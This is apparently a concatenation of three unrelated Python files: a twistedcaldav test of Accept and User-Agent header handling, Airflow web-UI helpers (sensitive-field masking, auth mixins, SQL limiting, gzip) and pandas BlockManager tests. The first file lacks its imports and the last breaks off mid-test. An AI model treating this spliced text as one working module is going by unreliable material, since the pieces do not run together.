import twistedcaldav.test.util
class AcceptType(twistedcaldav.test.util.TestCase):
    """
    L{bestAcceptType} tests
    """
    def test_bestAcceptType(self):
        """bestAcceptType picks the best allowed type for an Accept header."""
        # Each case: (label, ("Accept", header value) or None, allowed types,
        # expected chosen type or None).
        data = (
            (
                "#1.1",
                ("Accept", "text/plain"),
                ["text/plain"],
                "text/plain",
            ),
            (
                "#1.2",
                ("Accept", "text/plain"),
                ["text/calendar"],
                None,
            ),
            (
                "#1.3",
                ("Accept", "text/*"),
                ["text/plain"],
                "text/plain",
            ),
            (
                "#1.4",
                ("Accept", "*/*"),
                ["text/plain"],
                "text/plain",
            ),
            (
                "#2.1",
                ("Accept", "text/plain"),
                ["text/plain", "application/text", ],
                "text/plain",
            ),
            (
                "#2.2",
                ("Accept", "text/plain"),
                ["text/calendar", "application/text", ],
                None,
            ),
            (
                "#2.3",
                ("Accept", "text/*"),
                ["text/plain", "application/text", ],
                "text/plain",
            ),
            (
                "#2.4",
                ("Accept", "*/*"),
                ["text/plain", "application/text", ],
                "text/plain",
            ),
            (
                "#2.5",
                ("Accept", "application/text"),
                ["text/plain", "application/text", ],
                "application/text",
            ),
            (
                "#2.6",
                ("Accept", "application/*"),
                ["text/plain", "application/text", ],
                "application/text",
            ),
            (
                "#3.1",
                ("Accept", "text/plain;q=0.5, application/text;q=0.3"),
                ["text/plain", "application/text", ],
                "text/plain",
            ),
            (
                "#3.2",
                ("Accept", "text/plain;q=0.5, application/text;q=0.3"),
                ["text/calendar", "application/calendar", ],
                None,
            ),
            (
                "#3.3",
                ("Accept", "text/plain;q=0.5, application/text;q=0.3"),
                ["text/plain", "application/text", ],
                "text/plain",
            ),
            (
                "#3.4",
                ("Accept", "text/plain;q=0.5, application/text;q=0.3"),
                ["text/plain", "application/text", ],
                "text/plain",
            ),
            (
                "#3.5",
                ("Accept", "text/plain;q=0.3, application/text;q=0.5"),
                ["text/plain", "application/text", ],
                "application/text",
            ),
            (
                "#3.6",
                ("Accept", "text/plain;q=0.5, application/*;q=0.3"),
                ["text/plain", "application/text", ],
                "text/plain",
            ),
            (
                "#4.1",
                ("Accept", "text/plain;q=0.5, application/text;q=0.2, text/*;q=0.3"),
                ["text/calendar", "application/text", ],
                "text/calendar",
            ),
            (
                "#5.1",
                None,
                ["text/calendar", "application/text", ],
                "text/calendar",
            ),
        )
        for title, hdr, allowedTypes, result in data:
            hdrs = Headers()
            if hdr:
                hdrs.addRawHeader(*hdr)
            check = bestAcceptType(hdrs.getHeader("accept"), allowedTypes)
            self.assertEqual(check, result, msg="Failed %s" % (title,))
    def test_userAgentProductTokens(self):
        """
        Test that L{userAgentProductTokens} correctly parses a User-Agent header.
        """
        for hdr, result in (
            # Valid syntax
            ("Client/1.0", ["Client/1.0", ]),
            ("Client/1.0 FooBar/2", ["Client/1.0", "FooBar/2", ]),
            ("Client/1.0 (commentary here)", ["Client/1.0", ]),
            ("Client/1.0 (FooBar/2)", ["Client/1.0", ]),
            ("Client/1.0 (commentary here) FooBar/2", ["Client/1.0", "FooBar/2", ]),
            ("Client/1.0 (commentary here) FooBar/2 (more commentary here)  ", ["Client/1.0", "FooBar/2", ]),
            # Invalid syntax
            ("Client/1.0 (commentary here FooBar/2", ["Client/1.0", ]),
            ("Client/1.0 commentary here) FooBar/2", ["Client/1.0", "commentary", "here)", "FooBar/2", ]),
        ):
            self.assertEqual(userAgentProductTokens(hdr), result, msg="Mismatch: {}".format(hdr))
    def test_matchClientFixes(self):
        """
        Test that L{matchClientFixes} correctly identifies clients with matching fix tokens.
        """
        c = ConfigDict()
        c.ClientFixes = {
            "fix1": [
                "Client/1\\.0.*",
                "Client/1\\.1(\\..*)?",
                "Client/2",
            ],
            "fix2": [
                "Other/1\\.0.*",
            ],
        }
        # NOTE(review): called twice — presumably to verify the update is
        # idempotent; confirm.
        _updateClientFixes(c)
        _updateClientFixes(c)
        # Valid matches
        for ua in (
            "Client/1.0 FooBar/2",
            "Client/1.0.1 FooBar/2",
            "Client/1.0.1.1 FooBar/2",
            "Client/1.1 FooBar/2",
            "Client/1.1.1 FooBar/2",
            "Client/2 FooBar/2",
        ):
            self.assertEqual(
                matchClientFixes(c, ua),
                set(("fix1",)),
                msg="Did not match {}".format(ua),
            )
        # Valid non-matches
        for ua in (
            "Client/1 FooBar/2",
            "Client/1.10 FooBar/2",
            "Client/2.0 FooBar/2",
            "Client/2.0.1 FooBar/2",
            "Client FooBar/2",
            "Client/3 FooBar/2",
            "Client/3.0 FooBar/2",
            "Client/10 FooBar/2",
            "Client/10.0 FooBar/2",
            "Client/10.0.1 FooBar/2",
            "Client/10.0.1 (Client/1.0) FooBar/2",
            "Client/10.0.1 (foo Client/1.0 bar) FooBar/2",
        ):
            self.assertEqual(
                matchClientFixes(c, ua),
                set(),
                msg="Incorrectly matched {}".format(ua),
            )
|
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import object
from cgi import escape
from io import BytesIO as IO
import functools
import gzip
import dateutil.parser as dateparser
import json
import time
from flask import after_this_request, request, Response
from flask_login import current_user
import wtforms
from wtforms.compat import text_type
from airflow import configuration, models, settings
from airflow.utils.json import AirflowJsonEncoder
# Whether the web UI requires authentication ([webserver] section of the config).
AUTHENTICATE = configuration.getboolean('webserver', 'AUTHENTICATE')

# Substrings that mark a key (variable/connection field name) as sensitive.
# Matching is done against the lower-cased key name, so these must be lowercase.
DEFAULT_SENSITIVE_VARIABLE_FIELDS = (
    'password',
    'secret',
    'passwd',
    'authorization',
    'api_key',
    'apikey',
    'access_token',
)
def should_hide_value_for_key(key_name):
    """Return True when the value stored under ``key_name`` should be masked.

    A key is masked when its lower-cased name contains one of the
    ``DEFAULT_SENSITIVE_VARIABLE_FIELDS`` substrings AND the
    ``[admin] hide_sensitive_variable_fields`` config option is enabled.
    """
    lowered = key_name.lower()
    is_sensitive = any(token in lowered
                       for token in DEFAULT_SENSITIVE_VARIABLE_FIELDS)
    return is_sensitive and configuration.getboolean(
        'admin', 'hide_sensitive_variable_fields')
class LoginMixin(object):
    """Flask-Admin mixin: view is accessible to any authenticated user."""
    def is_accessible(self):
        if not AUTHENTICATE:
            # Authentication disabled: everything is open.
            return True
        return (not current_user.is_anonymous() and
                current_user.is_authenticated())
class SuperUserMixin(object):
    """Flask-Admin mixin: view is accessible to superusers only."""
    def is_accessible(self):
        if not AUTHENTICATE:
            return True
        return not current_user.is_anonymous() and current_user.is_superuser()
class DataProfilingMixin(object):
    """Flask-Admin mixin: view is accessible to users with data profiling rights."""
    def is_accessible(self):
        if not AUTHENTICATE:
            return True
        return (not current_user.is_anonymous() and
                current_user.data_profiling())
def limit_sql(sql, limit, conn_type):
    """Wrap a SELECT statement so at most ``limit`` rows are returned.

    Non-SELECT statements are returned unchanged (modulo stripped whitespace
    and trailing semicolons).  The wrapping dialect depends on ``conn_type``:
    ``mssql`` uses ``SELECT TOP``, ``oracle`` uses ``ROWNUM`` and everything
    else uses ``LIMIT``.
    """
    sql = sql.strip().rstrip(';')
    if not sql.lower().startswith("select"):
        return sql
    # Explicit .format() arguments instead of the original
    # .format(**locals()), which silently breaks on any local rename.
    if conn_type == 'mssql':
        return """\
SELECT TOP {limit} * FROM (
{sql}
) qry
""".format(sql=sql, limit=limit)
    if conn_type == 'oracle':
        return """\
SELECT * FROM (
{sql}
) qry
WHERE ROWNUM <= {limit}
""".format(sql=sql, limit=limit)
    return """\
SELECT * FROM (
{sql}
) qry
LIMIT {limit}
""".format(sql=sql, limit=limit)
def epoch(dttm):
    """Returns an epoch-type date"""
    # NOTE(review): the trailing comma makes this return a 1-tuple
    # ``(millis,)`` rather than a bare int.  Callers may rely on that shape,
    # so it is preserved here -- confirm against call sites before "fixing".
    # Also note time.mktime interprets dttm in the *local* timezone.
    return int(time.mktime(dttm.timetuple())) * 1000,
def action_logging(f):
    '''
    Decorator to log user actions

    Before invoking the wrapped view, records a ``models.Log`` row with the
    event name (the view's function name), the acting user, and the request
    arguments (``task_id``, ``dag_id`` and, when present, ``execution_date``).
    '''
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        session = settings.Session()
        try:
            if current_user and hasattr(current_user, 'username'):
                user = current_user.username
            else:
                user = 'anonymous'

            log = models.Log(
                event=f.__name__,
                task_instance=None,
                owner=user,
                extra=str(list(request.args.items())),
                task_id=request.args.get('task_id'),
                dag_id=request.args.get('dag_id'))

            if 'execution_date' in request.args:
                log.execution_date = dateparser.parse(
                    request.args.get('execution_date'))

            session.add(log)
            session.commit()
        finally:
            # The original leaked the session on every request; always
            # release it back to the pool before running the view.
            session.close()

        return f(*args, **kwargs)

    return wrapper
def notify_owner(f):
    '''
    Decorator to notify owner of actions taken on their DAGs by others
    '''
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        # NOTE(review): the notification logic below is disabled -- it lives
        # inside a string literal (and references names such as ``Template``
        # and ``send_email`` that are not imported in this module), so the
        # decorator is currently a no-op passthrough to ``f``.
        """
        if request.args.get('confirmed') == "true":
            dag_id = request.args.get('dag_id')
            task_id = request.args.get('task_id')
            dagbag = models.DagBag(settings.DAGS_FOLDER)
            dag = dagbag.get_dag(dag_id)
            task = dag.get_task(task_id)

            if current_user and hasattr(current_user, 'username'):
                user = current_user.username
            else:
                user = 'anonymous'

            if task.owner != user:
                subject = (
                    'Actions taken on DAG {0} by {1}'.format(
                        dag_id, user))
                items = request.args.items()
                content = Template('''
                    action: <i>{{ f.__name__ }}</i><br>
                    <br>
                    <b>Parameters</b>:<br>
                    <table>
                    {% for k, v in items %}
                        {% if k != 'origin' %}
                            <tr>
                                <td>{{ k }}</td>
                                <td>{{ v }}</td>
                            </tr>
                        {% endif %}
                    {% endfor %}
                    </table>
                    ''').render(**locals())
                if task.email:
                    send_email(task.email, subject, content)
        """
        return f(*args, **kwargs)
    return wrapper
def json_response(obj):
    """
    returns a json response from a json serializable python object
    """
    payload = json.dumps(obj, indent=4, cls=AirflowJsonEncoder)
    return Response(
        response=payload,
        status=200,
        mimetype="application/json")
def gzipped(f):
    '''
    Decorator to make a view compressed
    '''
    @functools.wraps(f)
    def view_func(*args, **kwargs):
        # The hook must be registered *before* the view runs so Flask applies
        # it to the response the view produces.
        @after_this_request
        def zipper(response):
            accept_encoding = request.headers.get('Accept-Encoding', '')

            # Client did not advertise gzip support: leave the response alone.
            if 'gzip' not in accept_encoding.lower():
                return response

            # Force the data to be buffered so ``response.data`` is available.
            response.direct_passthrough = False

            # Skip non-2xx responses and responses that are already encoded.
            if (response.status_code < 200 or
                response.status_code >= 300 or
                'Content-Encoding' in response.headers):
                return response
            gzip_buffer = IO()
            gzip_file = gzip.GzipFile(mode='wb',
                                      fileobj=gzip_buffer)
            gzip_file.write(response.data)
            gzip_file.close()

            response.data = gzip_buffer.getvalue()
            # Content-Length must be updated to the compressed size; Vary
            # tells caches the body depends on the Accept-Encoding header.
            response.headers['Content-Encoding'] = 'gzip'
            response.headers['Vary'] = 'Accept-Encoding'
            response.headers['Content-Length'] = len(response.data)

            return response

        return f(*args, **kwargs)

    return view_func
def make_cache_key(*args, **kwargs):
    '''
    Used by cache to get a unique key per URL
    '''
    # Hash the (unordered) query-string items so the same URL with the same
    # parameters always maps to the same key.
    query_hash = str(hash(frozenset(request.args.items())))
    return (request.path + query_hash).encode('ascii', 'ignore')
class AceEditorWidget(wtforms.widgets.TextArea):
    """
    Renders an ACE code editor.
    """
    def __call__(self, field, **kwargs):
        # Renders a visible <div> for the ACE editor plus a hidden <textarea>
        # that carries the field value on form submission.  The field content
        # is HTML-escaped before being embedded in the markup.
        kwargs.setdefault('id', field.id)
        html = '''
        <div id="{el_id}" style="height:100px;">{contents}</div>
        <textarea
            id="{el_id}_ace" name="{form_name}"
            style="display:none;visibility:hidden;">
        </textarea>
        '''.format(
            el_id=kwargs.get('id', field.id),
            contents=escape(text_type(field._value())),
            form_name=field.id,
        )
        return wtforms.widgets.core.HTMLString(html)
|
|
# -*- coding: utf-8 -*-
# pylint: disable=W0102
from datetime import datetime, date
import operator
import sys
import pytest
import numpy as np
import re
from distutils.version import LooseVersion
import itertools
from pandas import (Index, MultiIndex, DataFrame, DatetimeIndex,
Series, Categorical)
from pandas.compat import OrderedDict, lrange
from pandas.core.sparse.array import SparseArray
from pandas.core.internals import (BlockPlacement, SingleBlockManager,
make_block, BlockManager)
import pandas.core.algorithms as algos
import pandas.util.testing as tm
import pandas as pd
from pandas._libs import lib
from pandas.util.testing import (assert_almost_equal, assert_frame_equal,
randn, assert_series_equal)
from pandas.compat import zip, u
# in 3.6.1 a c-api slicing function changed, see src/compat_helper.h
# NOTE(review): this compares the full ``sys.version`` *string* against a
# LooseVersion -- it relies on distutils' lenient parsing; sys.version_info
# would be more robust.  Confirm before changing.
PY361 = sys.version >= LooseVersion('3.6.1')
@pytest.fixture
def mgr():
    """BlockManager fixture with one block per supported dtype family."""
    descr = (
        'a: f8; b: object; c: f8; d: object; e: f8;'
        'f: bool; g: i8; h: complex; i: datetime-1; j: datetime-2;'
        'k: M8[ns, US/Eastern]; l: M8[ns, CET];'
    )
    return create_mgr(descr)
def assert_block_equal(left, right):
    """Assert that two Blocks hold equal values, dtype and placement."""
    tm.assert_numpy_array_equal(left.values, right.values)
    assert left.dtype == right.dtype
    for blk in (left, right):
        assert isinstance(blk.mgr_locs, lib.BlockPlacement)
    tm.assert_numpy_array_equal(left.mgr_locs.as_array,
                                right.mgr_locs.as_array)
def get_numeric_mat(shape):
    """Return an int array of ``shape`` where element ``[i, ...] == i``.

    The first-axis index is broadcast across all trailing axes by giving
    those axes zero strides, then the view is copied into a real array.
    """
    base = np.arange(shape[0])
    strides = (base.itemsize, ) + (0, ) * (len(shape) - 1)
    return np.lib.stride_tricks.as_strided(
        x=base, shape=shape, strides=strides).copy()
N = 10
def create_block(typestr, placement, item_shape=None, num_offset=0):
    """
    Supported typestr:

        * float, f8, f4, f2
        * int, i8, i4, i2, i1
        * uint, u8, u4, u2, u1
        * complex, c16, c8
        * bool
        * object, string, O
        * datetime, dt, M8[ns], M8[ns, tz]
        * timedelta, td, m8[ns]
        * sparse (SparseArray with fill_value=0.0)
        * sparse_na (SparseArray with fill_value=np.nan)
        * category, category2

    ``placement`` gives the block's row locations within its manager,
    ``item_shape`` the per-item shape (defaults to ``(N,)``), and
    ``num_offset`` shifts the generated values so sibling blocks differ.
    """
    placement = BlockPlacement(placement)
    num_items = len(placement)

    if item_shape is None:
        item_shape = (N, )

    shape = (num_items, ) + item_shape

    # Base matrix: element [i, ...] == i (first-axis index broadcast).
    mat = get_numeric_mat(shape)

    if typestr in ('float', 'f8', 'f4', 'f2', 'int', 'i8', 'i4', 'i2', 'i1',
                   'uint', 'u8', 'u4', 'u2', 'u1'):
        values = mat.astype(typestr) + num_offset
    elif typestr in ('complex', 'c16', 'c8'):
        values = 1.j * (mat.astype(typestr) + num_offset)
    elif typestr in ('object', 'string', 'O'):
        values = np.reshape(['A%d' % i for i in mat.ravel() + num_offset],
                            shape)
    elif typestr in ('b', 'bool', ):
        values = np.ones(shape, dtype=np.bool_)
    elif typestr in ('datetime', 'dt', 'M8[ns]'):
        # Values are whole seconds expressed in nanoseconds.
        values = (mat * 1e9).astype('M8[ns]')
    elif typestr.startswith('M8[ns'):
        # datetime with tz -- extract the zone name from e.g. "M8[ns, CET]".
        m = re.search(r'M8\[ns,\s*(\w+\/?\w*)\]', typestr)
        assert m is not None, "incompatible typestr -> {0}".format(typestr)
        tz = m.groups()[0]
        assert num_items == 1, "must have only 1 num items for a tz-aware"
        values = DatetimeIndex(np.arange(N) * 1e9, tz=tz)
    elif typestr in ('timedelta', 'td', 'm8[ns]'):
        values = (mat * 1).astype('m8[ns]')
    elif typestr in ('category', ):
        values = Categorical([1, 1, 2, 2, 3, 3, 3, 3, 4, 4])
    elif typestr in ('category2', ):
        values = Categorical(['a', 'a', 'a', 'a', 'b', 'b', 'c', 'c', 'c', 'd'
                              ])
    elif typestr in ('sparse', 'sparse_na'):
        # FIXME: doesn't support num_rows != 10
        assert shape[-1] == 10
        assert all(s == 1 for s in shape[:-1])
        if typestr.endswith('_na'):
            fill_value = np.nan
        else:
            fill_value = 0.0
        values = SparseArray([fill_value, fill_value, 1, 2, 3, fill_value,
                              4, 5, fill_value, 6], fill_value=fill_value)
        # Offset only the stored (non-fill) values, in place via a view.
        arr = values.sp_values.view()
        arr += (num_offset - 1)
    else:
        raise ValueError('Unsupported typestr: "%s"' % typestr)

    return make_block(values, placement=placement, ndim=len(shape))
def create_single_mgr(typestr, num_rows=None):
    """Build a SingleBlockManager with one ``typestr`` block of ``num_rows`` rows."""
    rows = N if num_rows is None else num_rows
    block = create_block(typestr, placement=slice(0, rows), item_shape=())
    return SingleBlockManager(block, np.arange(rows))
def create_mgr(descr, item_shape=None):
    """
    Construct BlockManager from string description.

    String description syntax looks similar to np.matrix initializer.  It
    looks like this::

        a,b,c: f8; d,e,f: i8

    Rules are rather simple:

    * see list of supported datatypes in `create_block` method
    * components are semicolon-separated
    * each component is `NAME,NAME,NAME: DTYPE_ID`
    * whitespace around colons & semicolons are removed
    * components with same DTYPE_ID are combined into single block
    * to force multiple blocks with same dtype, use '-SUFFIX'::

        'a:f8-1; b:f8-2; c:f8-foobar'

    """
    if item_shape is None:
        item_shape = (N, )

    # First pass: collect item names and per-dtype row placements.
    offset = 0
    mgr_items = []
    block_placements = OrderedDict()
    for component in descr.split(';'):
        component = component.strip()
        if not component:
            continue
        names, blockstr = component.partition(':')[::2]
        blockstr = blockstr.strip()
        names = names.strip().split(',')

        mgr_items.extend(names)
        placement = list(np.arange(len(names)) + offset)
        block_placements.setdefault(blockstr, []).extend(placement)
        offset += len(names)

    # Second pass: materialize one block per dtype descriptor.
    blocks = []
    num_offset = 0
    for blockstr, placement in block_placements.items():
        typestr = blockstr.split('-')[0]
        blocks.append(create_block(typestr,
                                   placement,
                                   item_shape=item_shape,
                                   num_offset=num_offset, ))
        num_offset += len(placement)

    axes = [Index(mgr_items)] + [np.arange(n) for n in item_shape]
    return BlockManager(sorted(blocks, key=lambda b: b.mgr_locs[0]), axes)
class TestBlock(object):
    """Unit tests for individual Block objects built via ``create_block``."""

    def setup_method(self, method):
        # self.fblock = get_float_ex() # a,c,e
        # self.cblock = get_complex_ex() #
        # self.oblock = get_obj_ex()
        # self.bool_block = get_bool_ex()
        # self.int_block = get_int_ex()

        # One block per dtype family, placed at distinct manager locations.
        self.fblock = create_block('float', [0, 2, 4])
        self.cblock = create_block('complex', [7])
        self.oblock = create_block('object', [1, 3])
        self.bool_block = create_block('bool', [5])
        self.int_block = create_block('int', [6])

    def test_constructor(self):
        int32block = create_block('i4', [0])
        assert int32block.dtype == np.int32

    def test_pickle(self):
        def _check(blk):
            # round-trip through pickle and compare values/dtype/placement
            assert_block_equal(tm.round_trip_pickle(blk), blk)

        _check(self.fblock)
        _check(self.cblock)
        _check(self.oblock)
        _check(self.bool_block)

    def test_mgr_locs(self):
        assert isinstance(self.fblock.mgr_locs, lib.BlockPlacement)
        tm.assert_numpy_array_equal(self.fblock.mgr_locs.as_array,
                                    np.array([0, 2, 4], dtype=np.int64))

    def test_attrs(self):
        assert self.fblock.shape == self.fblock.values.shape
        assert self.fblock.dtype == self.fblock.values.dtype
        assert len(self.fblock) == len(self.fblock.values)

    def test_merge(self):
        avals = randn(2, 10)
        bvals = randn(2, 10)

        ref_cols = Index(['e', 'a', 'b', 'd', 'f'])

        ablock = make_block(avals, ref_cols.get_indexer(['e', 'b']))
        bblock = make_block(bvals, ref_cols.get_indexer(['a', 'd']))
        merged = ablock.merge(bblock)
        # merged rows interleave according to the source blocks' mgr_locs
        tm.assert_numpy_array_equal(merged.mgr_locs.as_array,
                                    np.array([0, 1, 2, 3], dtype=np.int64))
        tm.assert_numpy_array_equal(merged.values[[0, 2]], np.array(avals))
        tm.assert_numpy_array_equal(merged.values[[1, 3]], np.array(bvals))

        # TODO: merge with mixed type?

    def test_copy(self):
        cop = self.fblock.copy()
        assert cop is not self.fblock
        assert_block_equal(self.fblock, cop)

    def test_reindex_index(self):
        pass

    def test_reindex_cast(self):
        pass

    def test_insert(self):
        pass

    def test_delete(self):
        newb = self.fblock.copy()
        newb.delete(0)
        assert isinstance(newb.mgr_locs, lib.BlockPlacement)
        tm.assert_numpy_array_equal(newb.mgr_locs.as_array,
                                    np.array([2, 4], dtype=np.int64))
        assert (newb.values[0] == 1).all()

        newb = self.fblock.copy()
        newb.delete(1)
        assert isinstance(newb.mgr_locs, lib.BlockPlacement)
        tm.assert_numpy_array_equal(newb.mgr_locs.as_array,
                                    np.array([0, 4], dtype=np.int64))
        assert (newb.values[1] == 2).all()

        newb = self.fblock.copy()
        newb.delete(2)
        tm.assert_numpy_array_equal(newb.mgr_locs.as_array,
                                    np.array([0, 2], dtype=np.int64))
        assert (newb.values[1] == 1).all()

        # deleting past the end must raise
        newb = self.fblock.copy()
        with pytest.raises(Exception):
            newb.delete(3)

    def test_split_block_at(self):

        # with dup column support this method was taken out
        # GH3679
        pytest.skip("skipping for now")

        bs = list(self.fblock.split_block_at('a'))
        assert len(bs) == 1
        assert np.array_equal(bs[0].items, ['c', 'e'])

        bs = list(self.fblock.split_block_at('c'))
        assert len(bs) == 2
        assert np.array_equal(bs[0].items, ['a'])
        assert np.array_equal(bs[1].items, ['e'])

        bs = list(self.fblock.split_block_at('e'))
        assert len(bs) == 1
        assert np.array_equal(bs[0].items, ['a', 'c'])

        # bblock = get_bool_ex(['f'])
        # bs = list(bblock.split_block_at('f'))
        # assert len(bs), 0)
class TestDatetimeBlock(object):
    """Coercion behaviour of datetime64 blocks."""

    def test_try_coerce_arg(self):
        block = create_block('datetime', [0])

        # coerce None
        none_coerced = block._try_coerce_args(block.values, None)[2]
        assert pd.Timestamp(none_coerced) is pd.NaT

        # coerce different types of date objects
        vals = (np.datetime64('2010-10-10'), datetime(2010, 10, 10),
                date(2010, 10, 10))
        for val in vals:
            coerced = block._try_coerce_args(block.values, val)[2]
            # datetimes are coerced to their i8 (nanosecond) representation
            assert np.int64 == type(coerced)
            assert pd.Timestamp('2010-10-10') == pd.Timestamp(coerced)
class TestBlockManager(object):
    """Unit tests for BlockManager: construction, access, coercion, equality."""

    def test_constructor_corner(self):
        pass

    def test_attrs(self):
        # nblocks counts dtype blocks; len() counts items (columns).
        mgr = create_mgr('a,b,c: f8-1; d,e,f: f8-2')
        assert mgr.nblocks == 2
        assert len(mgr) == 6

    def test_is_mixed_dtype(self):
        assert not create_mgr('a,b:f8').is_mixed_type
        assert not create_mgr('a:f8-1; b:f8-2').is_mixed_type

        assert create_mgr('a,b:f8; c,d: f4').is_mixed_type
        assert create_mgr('a,b:f8; c,d: object').is_mixed_type

    def test_is_indexed_like(self):
        # _is_indexed_like compares the non-item axes only.
        mgr1 = create_mgr('a,b: f8')
        mgr2 = create_mgr('a:i8; b:bool')
        mgr3 = create_mgr('a,b,c: f8')
        assert mgr1._is_indexed_like(mgr1)
        assert mgr1._is_indexed_like(mgr2)
        assert mgr1._is_indexed_like(mgr3)

        assert not mgr1._is_indexed_like(mgr1.get_slice(
            slice(-1), axis=1))

    def test_duplicate_ref_loc_failure(self):
        tmp_mgr = create_mgr('a:bool; a: f8')

        axes, blocks = tmp_mgr.axes, tmp_mgr.blocks

        blocks[0].mgr_locs = np.array([0])
        blocks[1].mgr_locs = np.array([0])

        # test trying to create block manager with overlapping ref locs
        with pytest.raises(AssertionError):
            BlockManager(blocks, axes)

        blocks[0].mgr_locs = np.array([0])
        blocks[1].mgr_locs = np.array([1])
        mgr = BlockManager(blocks, axes)
        mgr.iget(1)

    def test_contains(self, mgr):
        assert 'a' in mgr
        assert 'baz' not in mgr

    def test_pickle(self, mgr):
        mgr2 = tm.round_trip_pickle(mgr)
        assert_frame_equal(DataFrame(mgr), DataFrame(mgr2))

        # share ref_items
        # assert mgr2.blocks[0].ref_items is mgr2.blocks[1].ref_items

        # GH2431
        assert hasattr(mgr2, "_is_consolidated")
        assert hasattr(mgr2, "_known_consolidated")

        # reset to False on load
        assert not mgr2._is_consolidated
        assert not mgr2._known_consolidated

    def test_non_unique_pickle(self):
        # duplicate item names must survive a pickle round trip
        mgr = create_mgr('a,a,a:f8')
        mgr2 = tm.round_trip_pickle(mgr)
        assert_frame_equal(DataFrame(mgr), DataFrame(mgr2))

        mgr = create_mgr('a: f8; a: i8')
        mgr2 = tm.round_trip_pickle(mgr)
        assert_frame_equal(DataFrame(mgr), DataFrame(mgr2))

    def test_categorical_block_pickle(self):
        mgr = create_mgr('a: category')
        mgr2 = tm.round_trip_pickle(mgr)
        assert_frame_equal(DataFrame(mgr), DataFrame(mgr2))

        smgr = create_single_mgr('category')
        smgr2 = tm.round_trip_pickle(smgr)
        assert_series_equal(Series(smgr), Series(smgr2))

    def test_get_scalar(self, mgr):
        # scalar access via (item, index) matches both access paths
        for item in mgr.items:
            for i, index in enumerate(mgr.axes[1]):
                res = mgr.get_scalar((item, index))
                exp = mgr.get(item, fastpath=False)[i]
                assert res == exp
                exp = mgr.get(item).internal_values()[i]
                assert res == exp

    def test_get(self):
        cols = Index(list('abc'))
        values = np.random.rand(3, 3)
        block = make_block(values=values.copy(), placement=np.arange(3))
        mgr = BlockManager(blocks=[block], axes=[cols, np.arange(3)])

        assert_almost_equal(mgr.get('a', fastpath=False), values[0])
        assert_almost_equal(mgr.get('b', fastpath=False), values[1])
        assert_almost_equal(mgr.get('c', fastpath=False), values[2])
        assert_almost_equal(mgr.get('a').internal_values(), values[0])
        assert_almost_equal(mgr.get('b').internal_values(), values[1])
        assert_almost_equal(mgr.get('c').internal_values(), values[2])

    def test_set(self):
        mgr = create_mgr('a,b,c: int', item_shape=(3, ))

        mgr.set('d', np.array(['foo'] * 3))
        mgr.set('b', np.array(['bar'] * 3))
        tm.assert_numpy_array_equal(mgr.get('a').internal_values(),
                                    np.array([0] * 3))
        tm.assert_numpy_array_equal(mgr.get('b').internal_values(),
                                    np.array(['bar'] * 3, dtype=np.object_))
        tm.assert_numpy_array_equal(mgr.get('c').internal_values(),
                                    np.array([2] * 3))
        tm.assert_numpy_array_equal(mgr.get('d').internal_values(),
                                    np.array(['foo'] * 3, dtype=np.object_))

    def test_set_change_dtype(self, mgr):
        mgr.set('baz', np.zeros(N, dtype=bool))

        mgr.set('baz', np.repeat('foo', N))
        assert mgr.get('baz').dtype == np.object_

        mgr2 = mgr.consolidate()
        mgr2.set('baz', np.repeat('foo', N))
        assert mgr2.get('baz').dtype == np.object_

        mgr2.set('quux', randn(N).astype(int))
        assert mgr2.get('quux').dtype == np.int_

        mgr2.set('quux', randn(N))
        assert mgr2.get('quux').dtype == np.float_

    def test_set_change_dtype_slice(self):  # GH8850
        cols = MultiIndex.from_tuples([('1st', 'a'), ('2nd', 'b'), ('3rd', 'c')
                                       ])
        df = DataFrame([[1.0, 2, 3], [4.0, 5, 6]], columns=cols)
        df['2nd'] = df['2nd'] * 2.0

        blocks = df._to_dict_of_blocks()
        assert sorted(blocks.keys()) == ['float64', 'int64']
        assert_frame_equal(blocks['float64'], DataFrame(
            [[1.0, 4.0], [4.0, 10.0]], columns=cols[:2]))
        assert_frame_equal(blocks['int64'], DataFrame(
            [[3], [6]], columns=cols[2:]))

    def test_copy(self, mgr):
        cp = mgr.copy(deep=False)
        for blk, cp_blk in zip(mgr.blocks, cp.blocks):

            # view assertion
            assert cp_blk.equals(blk)
            assert cp_blk.values.base is blk.values.base

        cp = mgr.copy(deep=True)
        for blk, cp_blk in zip(mgr.blocks, cp.blocks):

            # copy assertion we either have a None for a base or in case of
            # some blocks it is an array (e.g. datetimetz), but was copied
            assert cp_blk.equals(blk)
            if cp_blk.values.base is not None and blk.values.base is not None:
                assert cp_blk.values.base is not blk.values.base
            else:
                assert cp_blk.values.base is None and blk.values.base is None

    def test_sparse(self):
        mgr = create_mgr('a: sparse-1; b: sparse-2')
        # what to test here?
        assert mgr.as_matrix().dtype == np.float64

    def test_sparse_mixed(self):
        mgr = create_mgr('a: sparse-1; b: sparse-2; c: f8')
        assert len(mgr.blocks) == 3
        assert isinstance(mgr, BlockManager)

        # what to test here?

    def test_as_matrix_float(self):
        # interleaving upcasts to the widest float
        mgr = create_mgr('c: f4; d: f2; e: f8')
        assert mgr.as_matrix().dtype == np.float64

        mgr = create_mgr('c: f4; d: f2')
        assert mgr.as_matrix().dtype == np.float32

    def test_as_matrix_int_bool(self):
        mgr = create_mgr('a: bool-1; b: bool-2')
        assert mgr.as_matrix().dtype == np.bool_

        mgr = create_mgr('a: i8-1; b: i8-2; c: i4; d: i2; e: u1')
        assert mgr.as_matrix().dtype == np.int64

        mgr = create_mgr('c: i4; d: i2; e: u1')
        assert mgr.as_matrix().dtype == np.int32

    def test_as_matrix_datetime(self):
        mgr = create_mgr('h: datetime-1; g: datetime-2')
        assert mgr.as_matrix().dtype == 'M8[ns]'

    def test_as_matrix_datetime_tz(self):
        # tz-aware blocks keep their dtype but interleave to object
        mgr = create_mgr('h: M8[ns, US/Eastern]; g: M8[ns, CET]')
        assert mgr.get('h').dtype == 'datetime64[ns, US/Eastern]'
        assert mgr.get('g').dtype == 'datetime64[ns, CET]'
        assert mgr.as_matrix().dtype == 'object'

    def test_astype(self):
        # coerce all
        mgr = create_mgr('c: f4; d: f2; e: f8')
